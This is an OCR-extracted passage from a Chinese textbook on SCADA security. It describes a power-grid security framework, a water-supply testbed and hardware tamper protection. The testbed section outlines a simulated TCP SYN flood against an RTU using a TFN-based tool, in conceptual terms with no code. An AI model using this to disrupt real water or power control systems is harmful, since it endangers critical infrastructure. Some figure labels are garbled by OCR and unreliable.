行为分隔成很多区域是非常必要的。当测算必要的可用数据时需要考虑如下一些 因素: ① 合规性标准要求数据分析过程所需的总的时间长度。 ② 进行事件评估时所需采集日志的数量预测。 ③ 组织机构的事件响应要求,某些军事或其他关键设备需要快速主动响应能 力以满足快速数据恢复的需求。 ④ 用于完成分析功能的、可用信息的粗细粒度要求(例如很多或少量索引要求)。 通过适当测量安全域,将开始形成信息安全相关活动的场景图。通过测量和 分析这些行为活动,违反预先设置的信息安全策略的异常行为将很容易发现。此 外,不规则网络活动将被识别出来,以便用于进一步调查。 这种机制要求明确定义策略,并要求这些策略使用合适的信息分析工具进行 配置。正如信息安全域的边界防护一样,精确定义的变量使得资产、用户、应用程 序和网络行为可以辅助完成安全风险和威胁的检测。如果这些数据可以动态进行 判断,并响应网络中那些可观测的行为,“已知策略”的白名单将成为“智能列表”, 该“智能列表”系统有助于通过动态防火墙配置或入侵防护系统的规则生成机制 提高网络边界防护能力。 由于多种不同的威胁探测技术的综合使用,安全事件信息可以通过事件关联 系统进行深度分析,以此发现那些大规模的、更容易引发严重威胁或事故的攻击行 为。在“震网”病毒及其他高级威胁正试图通过IT 网络和服务渗透并威胁工业 SCADA 系统网络的新阶段,那些在传统IT 数据网络安全领域广泛使用的事件关 联技术将逐渐越过“边界”,在工业 SCADA 系统网络中得以应用。 威胁探测标准、基线分析和白名单机制等所有这些机制都依靠丰富的相关安 全信息作为基础。而这些安全信息将来自网络、资产、主机、应用程序、协议、用户, 以及所有有助于提高工业 SCADA 系统网络的“态势感知”能力和高效安全防护能 力的、必要的日志或监视信息。 第6 章 工业SCADA系统安全防护理论 与技术工程案例分析 上述章节本书详细分析了工业 SCADA 系统信息安全技术体系、关键技术,特 别介绍了工业 SCADA 系统的安全域划分方法等内容,形成了关于工业 SCADA 系 统网络安全防护技术的框架。在本章,作者结合近几年开展工业 SCADA 系统项 目的工程实践经验,在深入研究国内外工业控制网络面临的多种安全威胁和现有 解决方案的不足基础上,从工业 SCADA 系统安全体系以及现场设备的现场工况 角度,设计并实现了一种分布式的工业 SCADA 系统安全服务框架及相应产品。 该框架采用模块化设计、分布式的体系架构,通过对工业 SCADA 系统网络传输业 务消息的认证、签名、报文过滤等,形成安全工业 SCADA 系统业务信息(指经过安 全处理后的控制、测量、传感等消息),确保了基于SCADA 系统的工业控制网络和 业务消息的安全性和可靠性。当然,该框架在工程实现过程中也存在一些明显的 技术问题,需要进一步深化研究完善。 此外本章还介绍了其他一些具有实用价值的工业 SCADA 系统信息安全防护 技术,如工业控制系统现场设备级的防护技术及应用基于工业现场设备电气参数 特征的防护技术等。 6.1 典型电力 SCADA 系统安全服务 框架设计与工程实现 结合工程项目实际需求,本书作者及其团队设计并实现一种针对电力工业 SCADA 系统通信安全防护的安全服务框架,主要包括专用协议和系统,包括安全 设备管理系统、安全协议、工业 SCADA 系统子站级安全防护设备和工业 SCADA 系统测控终端级安全防护设备。该项目在国家有关信息安全防护规范的框架下进 行设计,主要能对电力SCADA 系统提供精细粒度的、基于生产控制业务的应用层 安全防护能力,用于保证现场SCADA 系统的“四遥功能”——遥控、遥信、遥测、遥 工 业 S C A D A 系 统 安 全 防 护 理 论 与 技 术 工 程 案 例 分 析 调功能安全以及现场SCADA 系统的通信信道安全,并具有电力SCADA 系统入侵 检测和访问控制能力,具有较强的电力工业控制系统生产控制业务针对性。 6.1.1 安全服务框架的设计目标 (1)安全性。综合采用消息认证和基于电力SCADA 协议的包过滤技术,保证 SCADA 系统控制端与现场受控端节点通信的安全可靠,解决传统的 IP 网络安全 方案无法适应非IP 技术的实时控制系统的问题。 (2)独立性。安全服务框架采用模块化的设计,独立于电力SCADA 系统的控 制端和受控端节点,易于兼容多种不同协议体制下的 SCADA 系统设备。安全服 务框架的升级与维护等操作,能够独立于SCADA 系统单独进行,同时 SCADA 系 统端节点设备本身的升级改造,也不会影响到安全服务框架。 6.1.2 安全服务框架系统实现 安全服务框架介于电力 SCADA 系统的控制端设备与受控端设备之间,采用 点对点的部署模式,整体网络系统架构如图6.1所示。 图6 . 1 安全服务框架网络架构 安全服务框架主要实现对 SCADA 系统控制端设备与受控端设备待发送消息 的安全封装,并将封装后的安全消息发送到目的 SCADA 系统节点;同时,安全服 务框架负责监听通过SCADA 通信网络发送过来的安全 SCADA 业务消息,对消息 进行认证,合法性检测处理,并将处理后的有效明文 SCADA 消息传递给 SCADA 系统端设备。 安全服务框架采用模块化设计,包括内部接口模块、外部接口模块、安全控制 模块、ISO5类安全服务提供模块、安全 SCADA 业务消息处理算法模块,并分为4 个层次:编程接口层、逻辑控制层、安全机制层和安全资源层。安全服务框架模块 与层次如图6.2所示。 (1)编程接口层。编程接口层是安全服务框架的对外统一接口,包括内部接 口模块和外部接口模块。内部接口模块负责与SCADA 系统端节点设备进行明文 信息交互,外部接口模块负责与通信对端节点设备通过 SCADA 通信网络进行安全信息的发送和接收。编程接口层定义了标准的调用接口,便于安全服务框架上 层代码以标准的方式进行调用,保证了安全服务框架的独立性。 (2)逻辑控制层。逻辑控制层是安全服务框架的核心调度层,包括安全控制 模块和安全策略配置文件。通过调用安全机制层的功能模块,结合配置文件的安 全处理流程,能够实现为SCADA系统端节点设备待发送消息添加用户身份信息, 进行签名和消息认证处理,报文封装等功能。 (3)安全机制层。安全机制层是安全处理功能的具体实现层,将参考 IP 网络 信息安全的技术体制,并改造、优化传统的IP 网络安全技术,实现通过安全机制 层,能提供具有实时控制工业网络特色的信息安全服务,即ISO 开放系统互连的五 大类服务,抗抵赖、机密性、完整性、鉴别、访问控制服务。 (4)安全资源层。安全资源层提供安全机制层需要的所有物理和逻辑资源的 抽象封装,主要包括安全机制层实现5大类安全服务操作时需要使用的各个管理 节点的随机数、ID 身份信息。 6.1.3 需要改进或完善的方面 从产品或设备形态上看,针对电力 SCADA 系统通信安全防护的安全服务框 架主要由安全管理中心、子站级 SCADA 系统安全防护设备、现场测控终端级 SCA- DA安全防护装置等构成。安全管理中心、子站级SCADA 系统安全防护设备、现 场测控终端级 SCADA安全防护装置分别部署于不同的物理位置,且相互距离很 远,因此需要借助原工业 SCADA 系统已有的通信网络进行通信交互,进而构建一 个安全防护的专用网络完成防护功能。该安全框架在实际应用中面临的问题主要 来自以下几方面。 1)现场施工部署 安全服务框架应用的工业系统属于能源工业企业,其生产控制现场具有野外 工业SCADA 系统安全防护理论与技术工程案例分析 无人值守、广域地理分布的特点,数目庞大的工业 SCADA 系统生产控制终端分布 于现场环境中。在该工业SCADA 系统中部署安全管理中心、子站级 SCADA 系统 安全防护设备、现场测控终端级SCADA安全防护装置, 一方面需解决如何确保不 影响原有系统/装置的正常运转,进行设备部署施工、开通、调试的问题;另一方面, 由于工业 SCADA 系统现场设备具有“点多面广”、“山高路远”及现场环境恶劣的 特点,在施工部署过程中将不得不考虑安装、调试安全服务框架的人力成本、经济 成本等因素;最后,由于安全管理中心、子站级SCADA 系统安全防护设备、现场测 控终端级 SCADA 安全防护装置形成了自成体系,而且独立于原有工业 SCADA 系 统的安全网络,还需要很好地解决该网络的管理问题。 2)密钥管理问题 为实现对工业 SCADA 系统专用网络和专用协议的安全防护,安全服务框架 设计了对原有工业 SCADA 系统专用协议的消息认证机制,因而不可避免地涉及 密钥管理问题。但是,工业 SCADA 系统的功能单一、带宽有限、网络规模和容量 有限、实时性要求高,而且改造/新建该网络投资巨大,因而不具备条件像IP 数据 网一样大规模构建证书中心(CA) 系统、密钥分发中心(KDC) 、密钥管理中心 (KMC)来解决密钥管理问题。所以,如何以现有的工业 SCADA 系统网络为基础, 以较少的带宽开销和网络交互流量为代价,寻找到一种满足工程实现性和安全性 的解决方案是安全服务框架的关键技术之一。 3)对控制系统实时性的影响评估 从工程项目实际开展的情况分析, 一方面,项目涉及的业主单位(某能源公 司)非常关注项目开发的安全管理中心、子站级 SCADA 系统安全防护设备、现场 测控终端级 SCADA安全防护装置对其核心生产控制网络的实时性产生的影响, 以及由此可能产生的经济损失和负面影响;而另一方面,项目研发团队或施工方却 很难确保该框架的部署不会造成网络延迟,并影响实时性。因而,该项目可能难以 达到全网大规模部署的理想效果。 4)升级换代与补丁安装 在工业 SCADA 系统中完成安全框架的部署后,另一个需要着力解决的问题 是,安全管理中心、子站级SCADA 系统安全防护设备、现场测控终端级 SCADA 安 全防护装置的功能软件升级换代、版本更新、兼容新系统和新协议以及补丁安装问 题,该问题是一套成熟的信息安全产品必须设计完善的方面。在本项目中,研发团 队面临在线更新和离线更新两种选择。在线更新情况下,需要很慎重地处理由升 级问题而引发的大量网络流量和带宽占用,有可能影响工业控制系统的实时性,尤 其是影响控制报文的高速交互。而在离线更新情况下,面对数量庞大的某工业 SCADA 系统现场设备/装置,如何权衡大规模升级换代的经济效益与成本控制的 关系是很现实的问题。 上述问题正是工业 SCADA 系统信息安全防护技术在实际工程实践中将会遇到的普遍性问题,而由于工业控制系统信息安全技术是近几年来才出现的新领域, 技术发展并不成熟。因此,目前很难从技术上很完美地解决上述问题。在本书涉 及的安全服务框架工程项目中,项目双方经过协商,从制定专用管理措施、减少受 保护网络节点规模、定制安全防护功能模块以及固化某些密钥参数等非技术途径, 寻找到了双方都能接受的方案解决上述问题,因而确保工程得以顺利开展。 6.2 基于测试床的工业 SCADA 系统 信息安全技术及应用 城市供水工厂SCADA 系统利用计算机信息技术、通信技术和自动化控制技 术对整个供水管网运行过程的主要参数、管网信息、设备运行状况进行动态监测、 实时调度和自动化控制,实现自动化信息管理。供水 SCADA 系统根据经济技术 指标和实际情况,进行优化控制,完成对供水管网调度各个环节的合理配置,成为 保障供水管网经济可靠运行的关键,供水 SCADA 系统的信息安全对确保整个供 水过程的安全具有重要意义。构建一种测试床对供水 SCADA 系统的信息安全进 行研究分析,其作用非常明显。 6.2.1 供水 SCADA 系统测试床模拟环境整体结构 测试床网络拓扑模拟环境的构建基于真实的供水 SCADA 系统网络。我们使 用真实 SCADA 系统中的组件:RTU、传感器、,传动装置(actuator)、MTU、HMI 服务 器和HMI客户端。网络拓扑由多个局域网(LAN) 组成,它们之间通过互联网连 接。图6.3显示的是测试床模拟环境所使用的通用 SCADA 拓扑结构。图中左边 图6.3 供水 SCADA 系统测试床模拟环境网络拓扑 工业SCADA系统安全防护理论与技术工程案例 分析 的部分显示的是供水现场或过程控制网络,它们由RTU、传感器和传动装置组成; 右边的部分显示的是供水企业管理网络,它由MTU、HMI 服务器和客户端组成。 过程控制网络和企业网络使用路由器通过互联网进行相互之间的连接。在现场网 络中,传感器发送信息容器中水位信息,传动装置是一个泵发电机,它可以被打开 或关闭[62]。 6.2.2 测试床中的供水 SCADA 系统模拟部件 传感器和传动装置使用NXT公司生产的测距传感器(sd) 和伺服发电机(am) 来实现。网关(gw) 组件使得真实的传感器和传动装置可以附加于测试床环境。 HMI 客户端由通过网关连接到模拟器上的外部程序实现。所有测试床中的内部 对象,例如 RTU、MTU、传感器、传动装置和 HMI 客户端由SCADA 模拟中的 OM- NET++ (一个离散事件仿真工具)模块实现外部真实对象。每个组件有它自己的 代理,用来在模拟环境内部模仿外部设备的状态。 测试床所使用的软件和硬件包括:OMNET++、Lego Mindstorms NXT(一种微 控制可编程单元)和 Modbus TCP/IP 协议(一种被关键基础设施应用程式所广泛 采用的标准协议)。 1)仿真平台 仿真平台基于OMNET++, 它是一个用C++ 编写的、面向对象的离散事件 仿真框架。它基于组件模块的概念,彼此之间的通信使用消息传递。模块之间的 通信要么通过输入或输出门,要么通过离散消息。模块可以级别层次的方式加以 组合。 OMNET++ 使用一系列工具,用于设计和实现离散事件仿真。具体而言,对 于供水 SCADA 系统测试床,使用的是拓扑图像编辑器—OMNET++IDE 和 INET 框架。INET 是一个实现互联网通用协议的框架,例如TCP、UDP、IP 和 MAC 协议。 2)硬件设备仿真 对于仿真供水生产过程中的硬件设备,例如传感器和传动装置,测试床可以使 用Lego Mindstorms NXT,是一个微控制设备,包含用于执行代码的CPU。该设备支 持最多七种设备(四个传感器和三个传感器)连接到它所使用的端口。其CPU 是 基于32位的ARM7,具有256KByte Flash 和64KByte 内存。它也有蓝牙无线通信 和每秒12Mbit 的 USB2.0 连接速度。 在供水 SCADA 系统测试床中,仿真的是供水 SCADA 系统中大量应用的过程 控制可编程逻辑控制(PLC) 单元。通过使用该 PLC 可以获得传感器数据和简单 的传动装置行为,例如打开或关闭伺服器发电机。测试床中不使用NXT 做任何数 据或逻辑处理,因为这些处理发生在供水 SCADA 系统的 RTU 和 MTU 上。 对于测试床中描述的模拟场景,只使用下列传感器和传动装置, (1)测距计使用超声波——以厘米测量距离。能够测量多达255cm, 精度误 差在+/ - 3cm之间的距离。 (2)发动机传动装置——测试床工程中使用的传动装置是伺服器。发动机有 一个内置的转动传感器,允许精确控制发动机的运动。转动轨迹按照0°到360°的 范围测量。 离线 NXT设备在设备和模拟器之间没有 socket 通信能力。为了简化 socket 通信过程,测试床中用LeJOS 固件代替 NXT 固件,LeJOS 固件提供了基于Java 的 API, 用于开发设备上运行的应用程序。使用这种 API 接口捕获传感器 sd 状态的 改变情况,并打开或关闭传动装置am 。Java 程序打开到模拟器的连接,发送传感 器状态改变,并接收请求,用于打开或关闭发动机。 3)Modbus 协议 Modbus 协议由Modicon 在20世纪70年代开发。最初,它只用于Modicon 的 可编程控制器上工作。然而,Modbus 协议如今变成一个用于传输离散、同类 I/O 信息、工业控制和监视设备之间的寄存器数据的工业标准。 Modbus 设备通信使用主站一从站(客户端一服务器)的方法。在 Modbus 业 务名称中,从站作为服务器,主站作为客户端。在这个系统中,只有主站(客户端) 能够发起通信。从站(服务器端)以向客户端(主站)提供请求数据或执行请求行 为的方式进行响应。 Modbus 协议有两个主要的变体:Modbus/RTU(串行链路上的主站/从站通信) 和 Modbus/TCP 。RTU 变体指定用于在串行链路上运行(物理层),TCP 变体类似 于运行在以太网上带有TCP 接口的串行Modbus。 这被称为 Modbus TCP/IP。供 水 SCADA 系统测试床主要使用 Modbus TCP/IP 协议。 Modbus TCP/IP协议消息结构包括数据头,它包含 Modbus 应用协议报文头 (MBAP) 和协议数据单元(PDU) 。 图6 .4解释了Modbus 协议的消息结构。Modb- us 头有4个7Byte 的域。业务 ID 域帮助识别给定请求的响应。 一个唯一的业务 ID 来自客户端在请求信息上创建,协议识别符指示由MBAP(用于Modbus 的0)生 成的应用协议封装。长度域定义了保留域(ID 单元加 PDU)的总体字节。单元ID 识别与业务关联的从站设备。Modbus 的 PDU 有两个域, 一个子节的域用于功能 码,另一个用于消息载荷。载荷有一个252Byte 限制的变体。请求信息中的功能 Modbus Application Protocol Header MBAP(7 Byte) Procotol Data Unit(PDU) Transaction ID Protocol Identifier Length Field Unit ID Function code Payload (2 Byte) (2 Byte) (2 Byte) (1 Byte) (1 Byte) (Varues) 图6.4 Modbus协议结构 代码指定了主站终端单元(MTU) 的操作请求。请求信息中的相应的域用于携带 返回给主站的状态信息。载荷包含与功能代码、请求或响应结果信息的有关的数 据。响应信息与请求信息有相同的结构。 主站设备(MTU) 通过 socket 链路连接从站设备(RTU) 。 从站设备默认监听 502端口的外来 TCP连接。 供水 SCADA 系统测试床中使用的 Modbus TCP/IP协议实现是来自libModbus 库 。libModbus 库实现使用真实的 BSDsocket,因为它是在真实的Modbus 系统中使 用的。供水 SCADA系统的模拟,使用INET 支持TCP/IP 协议的框架。框架提供 与 socket 结构等价的 TCPSocket类。在基于 OMNET++ 的模拟中代替 socket 结 构。为了遵守OMNET++ 标准,供水 SCADA 系统测试床用INET TCPSocket 类替 换了所有 socket引用,也修改了原始方法,使之更面向对象,并且减少了Modbus 内 的每个函数调用之间的数据传输数量。尽管这些改变改进了供水 SCADA 系统测 试床实现的性能、方法功能和为了兼容性的目的它的操作需要保持非常相似。 4)将真实设备引入模拟 模拟由两个不同环境构成:模拟环境和外部环境(真实的工业设备)。模拟环 境是由模拟的组件构成的模拟的世界。相反,外部环境是真实的工业设备,外部环 境中这些实际的传感器和传动装置在供水 SCADA 系统业务中工作。 为了整合这些环境,供水SCADA 系统测试床创建了一个网关(gw), 用来转换 模拟世界和真实世界之间的信息。网关作为TCP/IP 服务端来实现的,TCP/IP 服 务端监听来自外部世界的请求,并从模拟世界向外部环境发送请求和响应。 图6.5显示了这种关系。实际的传感器通过使用TCP/IP 网关上的端口打开 连接向网关发送它们的状态,并发送信息。 图6 . 5 测试床的模拟和物理设备之间的通信关系图 网关通过模拟环境向传感器代理发送信息。RTU 接收来自传感器的模拟请求, 并通过传感器代理将相关数据返回。RTU 与传感器代理和传动装置代理都有连接。 通过标准 Modbus TCP 消息,网关与模拟代理通信。测试床创建了一个用于网 关和外部设备之间更简单的协议。网关使用一个简单和直观的称作 ExtComm 的 客户协议,与外部NXT 设备进行通信。它包含3个域:地址、功能代码和载荷。地 址域用真实的传感器/传动装置匹配模拟的传感器/传动装置[°]。 图6 . 6显示了 ExtComm 协议的消息结构。地址域有两个无符号字节,这意味 着它最多能映射65535个传感器/传动装置。功能代码只定义了两个函数,读和写 每个1Byte 。载荷包含被传输的数据。它的最大数量是57Byte, 因为我们需要消息 是一个固定的大小。 57 Byte Address Function Code Payload 图6.6 ExtComm 消息结构 5)模拟消息 在供水控制过程模拟中有两种类型的消息:Modbus TCP/IP 消息和 ExtComm 消息。ExtComm 消息只在网关和 NXT设备之间交换。 所有在模拟环境中交换的消息是 Modbus TCP/IP 消息,包括 HMI 客户端。当 事件发生时,传感器发送消息。事件定义为探测到的改变,它是真实传感器监视 的。每一层改变发生,传感器就使用 ExtComm 消息向网关发送它的新值。 图6.7的时序图显示从真实传感器到 RTU 的消息流。传感器发送 extc_sensor_ reading消息到网关。网关将这个 ExtComm 消息转化为 Modbus mb_write_register_ request 消息,并将它发送到合适的传感器代理。 代理然后将这个消息发送到 RTU,RTU 完成请求操作,并发送 mb_write_regis- ter_request 响应传回给传感器代理。 在图6 . 7的序列图中,RTU 请求伺服器端发动机打开,通过发送 Modbus mb. write_coil_request 消息给伺服器端代理。服务器端发动机代理然后发送这个消息 给网关,它将之转化为 ExtComm 的 extc_turn_motor 消息,并发送到外部传动装置 (伺服器端发动机)。伺服器发动机完成动作并返回确认消息extc_confirmation. operation给网关,它被转化为 Modbus 响应信息 modbus_write_register_response 发 给伺服器发动机代理,并转发给 RTU。 6)模拟部件 测试床的模拟部分由7个主要部件组成:现场设备、现场设备代理、网关、 RTU、MTU/HMI、HMI客户端代理和 HMI 客户端,如图6.8所示。 (1)现场设备。现场设备是真实的传感器或传动装置。它是4个传感器和3 个发动机中的1个,它能附加于Lego NXT。 传感器 《传感器》 《网关》 GW Q 传感器 《代理》 Q 伺服变速装置 《发动机》 exe sensor readingX? rnie regserrqusrxh mb_write_register_request(X.Y) mb_wrte_register_response(X.Y) nmb write coll requestXx mb wrtte_coil_request(X.Y) ve uim motontx) ewe canfimaicn ohhon modbus_writc register response(X.Y) modbt _write_registcr_respor Y) 图6 . 7 请求和响应消息工作流 图6.8 供水 SCADA 系统测试床模拟部件之间的关系 现场设备在测试床中通过socket 连接向网关发送消息来进行通信。现场设备 代理使用 socket 连接通过网关接收消息。现场设备和网关是连接到物理通信介质 上的两种不同设备,对于这种情况,使用蓝牙协议连接这些设备。前面提到的 Ext- Comm 协议,使用蓝牙进行通信。 (2)HMI 客户端。在真实的供水 SCADA 系统中,操作员使用HMI 客户端监 视和控制系统。由于这个原因,测试床在模拟的外部环节,实现并运行一个真实的 HMI客户端。其上执行的操作是由操作员完成的真实控制行为。为了与模拟器通信,它向网关发送TCP/IP 消息,然后将 TCP/IP 消息转换为模拟消息并向 HMI 客户端代理和 HMI服务器端传送。 (3)现场设备代理。现场设备代理表示模拟中的现场设备。它包含现场设备 提供的所有信息。RTU 接收这些代理的信息更新。MTU 完成的任何 请求也需 要发送到代理,然后它们通过网关被发送到真实的现场设备 (4)HMI 客户端代理。HMI 客户端代理表示模拟的客户端应用程序。来自 HMI客户端的每个请求都通过网关,然后被传送到 HMI 客户端代理,HMI客户端 代理再将它们发送到 HMI 服务器端。按照反向路径,响应开始被路由从 HMI客 户端传输到网关。然后再到真实的 HMI客户端。 (5)网关。网关负责将来自真实设备的请求和响应进行转换;反之亦然。它 监听预先定义的TCP/IP1502 端口上的请求,并与所有外部设备、传感器、传动装 置和 HMI客户端进行通信。如果外部目的地是 HMI 客户端,然后消息就不需要 转换,因为客户端也使用Modbus 协议。 (6)RTU 。RTU 表示真实的 RTU 设备,它们完成与真实 RTU一样的任务。 由于在 Modbus TCP规范中被定义,RTU 是依赖请求而行动的从站服务器。它们 不能发起一个通信过程。它们响应来自MTU 的行为请求,并传递信息返回 给 MTU。 (7)MTU/HMI 服务器端。MTU 负责控制和监视 SCADA 系统。它与真实的 MTU 设备一样完成相同的活动。它与 RTU 进行通信收集网络的信息并响应网络 的行为。HMI服务器端负责为操作员提供SCADA 系统的报告。HMI服务器端接 收请求、向 HMI 客户端提供响应。 6.2.3 供水 SCADA 系统测试床中的攻击模拟试验 供水 SCADA 系统测试床测试的目的是为了评估在抵御恶意攻击条件下的 SCADA 网络的冗余能力。基于简单的供水 SCADA 系统网络,测试床向用户提供 HMI图形应用程序,它给予他们控制外部供水控制设备的能力和监视一些环境变 量,例如容器的水位。在通常场景下,用户(HMI 操作员)应该能够开启和关闭所 控制系统的发动机(传动装置),应该能够请求得到所控制系统的水位信息。从图 形控制台,操作员可以检查容器水位,而且基于这些信息打开或关闭水泵(传动装 置)。在这种攻击测试场景下,系统功能会受到影响。操作员会出错或延迟环境 的信息,例如错误的容器水位。基于这些错误信息,操作员可能采取错误的动作, 这可能会损害正常的系统操作。在下面的部分,将介绍供水 SCADA 系统测试床 的 SCADA 网络拓扑和针对它的攻击场景。 1)供水工厂 SCADA 系统 供水工厂 SCADA 系统应用场景是一种简化版本的真实的 SCADA 系统,它监 视和控制供水工厂。这个简化版本,如图6.9所示,有两个容器组成(容器1和2)和一个水泵。在容器2的顶部是一个用于测量容器水位的传感器。如果水位低于 预先定义的值,水泵就打开并从容器1往容器2注水。如果容器1没有水,它通过 HMI 客户端应用程序向操作员报警。操作员可能采取必要方法往容器1中添加 水。操作员也可以手动打开水泵往容器2添加。无需多说,所有操作都是通过 HMI 客户端应用程序完成的。尽管这是一个简单场景,但它表示的是一个供水工 厂的真实操作。 水平线标尺 MTU/HMI 服务器 HMI客户端 图6 . 9 供 水 SCADA 系统组成示意图 图6.9使用的 SCADA 网络拓扑场景中有一个带有传感器的 RTU 和附加在其 上的传动装置。有一个 HMI客户端和 MTU/HMI 客户端主机,路由器负责在互联 网上的两个局域网之间路由信息。 水位计量计用 NXT 的测距计传感器(sd) 表示,水泵用 NXT 的伺服电动机 (am) 表示。传感器定期向 RTU 更新水位的变化。如果水位达到 SCADA 操作员 定义的最小值,RTU 会向伺服马达发送消息,让它打开自己直到水位达到合适的 高度。出于安全,操作员也会使用HMI 客户端手动强制打开水泵。手动操作会覆 盖 RTU 目前的逻辑。在实际中,会有成百上千个 MTU 管理的水泵和容器。 2)攻击场景 在攻击场景中,供水 SCADA 系统功能将会被影响。例如,操作员会得到关于 环境的错误或延迟的信息,比如错误的水位信息和事件发生时间。基于这些错误 信息,操作员可能会作出错误判断,采取错误的动作,这会对供水 SCADA 系统的操作产生不利的影响。在测试床的试验项目中,主要使用TCP SYN 泛洪攻击,目 的是扰乱供水工厂SCADA 系统的正常操作。 6.2.4 供水 SCADA 系统测试试验结论 在供水 SCADA 系统测试床的 DDos 攻击场景中,恶意攻击者用TCP SYN 数据 包进行泛洪,其目的是为了扰乱正常系统操作。OMNET++ 和 INET 不支持模拟 超载连接 RTU节点的可能性。为了获得这种行为,测试床设计过程修改 INET 框 架,目的是为了限制同时并发的 TCP 连接。这个限制通过模拟配置文件进行配 置。另外,在一段时间之后,不活跃的 TCP 连接将会被丢弃,模拟正常主机的行 为。具体工程实现时是对开源项目Rease 的一个修改版本进行改进。Rease 也提 供 DDos 实现,它基于TFN(Tribe 泛洪网络)工具。测试床使用它来实现恶意攻 击者。 为了用TCP SYN 泛洪攻击进行试验,在整个模拟中,测试床保留连接时创建、 丢弃和关闭的 TCP 数量,在正常和攻击环境下。 图6 . 10表明对 SCADA RTU 的 DDos 攻击效果。在这个模拟中,测试床使用 10个攻击者,每个发送1000 TCP SYN数据包。攻击开始于模拟的时间基线Time = 700。时间在0~700s 之间(0 <T<700) 显示的是典型 SCADA RTU 的正常行为, 在这里创建,接收和关闭TCP 连接是没有任何问题的。在 Time =700 处 ,RTU 开 始接收到大量请求新建 TCP 连接的数据包。RTU 处开放 TCP 连接的数量猛增,并 达到并发连接的限制,在100 的情况下,开始丢弃新的连接请求。当攻击完成时 (大约T=730), 只有当已经打开的连接开始关闭时,或者超时或者用户请求时, 图6 . 10 供 水 SCADA 系统 RTU 遭受攻击的统计表 RTU 开始再次接受连接。图中的椭圆圈表明同步过程。每关闭连接, 一个新接受 的连接开始创建。因为测试床是用低流量模拟 SCADA 网络,所以当遭受攻击时, 丢弃连接的数量会维持常量。 6.3 工业 SCADA 系统现场设备级的防护技术及应用 前面章节所讨论的工业 SCADA 系统安全防护技术主要集中于对工业 SCADA 系统的网络、系统级的保护。但是,工业 SCADA 系统中广泛存在的是大量野外无 人值守的现场终端设备,这些现场终端设备往往与生产控制过程(如供电、供水、 油/气管网等)紧密连接, 一方面自身处于自动控制网络中,与其他现场终端设备 相邻;另一方面,现场终端设备直接与物理、化学过程关联,转换控制命令并传送现 场测量参数。从某种意义上讲,工业 SCADA 系统现场终端设备是整个工业 SCADA 系统中的薄弱环节。近年来,国外出现了一些针对工业 SCADA 系统现场终端设 备的安全防护产品,如美国 DCB公司的工业网络串口加密工具等,本书在此介绍 了一种具有实用价值的、针对工业 SCADA 系统现场设备的防护技术l]。 工业 SCADA 系统控制设备(如电力自动控制设备、石油/天然气管道控制设 备等)进行生产过程中的数据采集与实时控制作业时,很多情况下现场设备之间 使用串口(RS-232、RS-422 与 RS-485) 进行基于工业控制系统协议的通信(例 如现场总线网等)。 一般情况下,这类生产过程通信属于专用、封闭型通信网络, 在早期设计时,物理安全、功能安全问题还没有凸现出来,物理安全、功能安全通常 都不是一个重要的设计要求,因而为了提高性能要求和节约成本,通常都忽略了串 口实时通信的物理安全、功能安全考虑。 为了解决现有的工业 SCADA 自动控制设备的串口遭恶意拆除、拔断或中止 问题,以及弥补串口被恶意插拔后无法察觉;即使抓获破坏分子,也已经造成严重 的工业事故,造成不可挽回的财产损失的缺陷。可以在工业 SCADA 系统现场设 备中使用一种保护工业设备用串口接头的安全装置,该安全装置包括两部分: (1)位于线路末端的安全加固串口接头; (2)安全加固接头相连的线路监测装置。 其中安全加固串口接头包括带锁外壳,内置固定螺丝、连接电缆,如图6.11 所示。 线路监测装置包括:带锁外壳、语音告警模块、电源模块、开路检测器、防拆卸 电路开关、断路监测器、串口固定接口、电池供电模块等模块,其设计示意图如 图6.12所示。 该装置的保护原理是: (1)当恶意破坏者试图将工业 SCADA 系统现场设备的串口进行恶意插拔时, 由于串口头带锁外壳的保护,破坏者将无法接触到串口的固定螺丝,防止了关键工安全加固串口头 图6.11 安全加固串口头外形示意图 图6.12 线路检测装置设计示意图 业过程中设备的串口被恶意插拔。 (2)当破坏者直接对串口的通信线路进行破坏时,线路监测装置中的断路监 测器将及时发现线路断路,通过语音告警。 (3)当破坏者将线路监测装置的电缆剪断或者将插头直接拧下来时,利用回 路的电平变化,触发断电监测报警。 (4)当破坏者试图对线路监测装置进行强行拆卸时,防拆卸外壳与断路开关 相连,利用回路的电平变化也将触发警报。 采取上述安全装置,应用线路通断监测电路配合加固安全串口接头。实现了 对工业关键自动控制设备的串口的防恶意插拔的安全加固以及对线路中断的实时 监控,可以确保核心控制系统正常运行,保证财产安全,杜绝重大事故的发生。 上述安全装置还可以通过修改内部电路结构的方式支持工业 SCADA 系统设 备的以太网接口和USB 接口。 6.4 基于工业现场设备电气参数特性的 防护技术及应用 本书前述章节曾经介绍了安全域中基于异常行为的探测方法,工业 SCADA 系统现场设备的异常行为除了指现场设备的内在的网络行为、常规的生产控制运 行操作外,还可以是现场设备的电压、电流甚至某种运转频率等外在物理特征,利 用这些特征也可以对现场设备的信息安全态势作出评估判断。国外一些研究机构 深入开展了这方面的研究工作,并取得了一些很有参考价值的研究成果。其中比 较知名的是研究人员基于美国密歇根大学电子工程与计算机科学系副教授凯文 · 傅(Kevin Fu)的理论,开发出的一种新技术,该技术能够通过记录这些电子设备在 耗电量(电压、电流)上的微小变化来发现工业控制系统嵌入式设备中感染的恶意 病毒,该技术最初是应用于医疗嵌入式设备,也可以应用于发电厂等工业控制系统 环境中的嵌入式设备,这种系统被称为WattsUpDoc。 工业 SCADA 系统现场设备(如 PLC、FTU、IED 等)一般运行一些非通用的、不 公开的嵌入式操作系统,严格限制的操作系统资源条件和非普及的特点,迫使这类 工业控制网终端的嵌入式操作系统难以使用杀毒软件或自动更新这些操作系统内 核。WattsUpDoc 技术基于工业控制系统现场设备的电能量变化情况探测病毒,而 不需要改动原有设备的硬件和软件或网络通信。多数工业 SCADA 系统现场设备 的嵌入式操作系统具有两个重要特征: (1)工业 SCADA 系统现场设备通常重复运行预先精确定义好的任务,在长时 间运转过程中一般不会发生变化。 (2)工业 SCADA 系统现场设备从电源插座获取电源。 使得被动监听其异常行为成为可能,电源插座可以作为不更改硬件型监测方 法的监测点。工业控制系统现场设备通常完成一些重复性的功能,例如启动电动 机、控制阀门、采集传感器数值等。现场设备基于现成的操作系统(例如一种 com- pounder 操作系统),通常只运行一个独立的应用程序,但该程序却束缚了操作系 统的运行,并常常尽可能多地占用操作系统资源,使操作系统只能实现一种功能。 因而这类工业控制设备专用嵌入式操作系统的有形存储空间一般非常小。 电子设备的耗电量情况可作为一种隐蔽的旁路信息泄露渠道早已被人们发 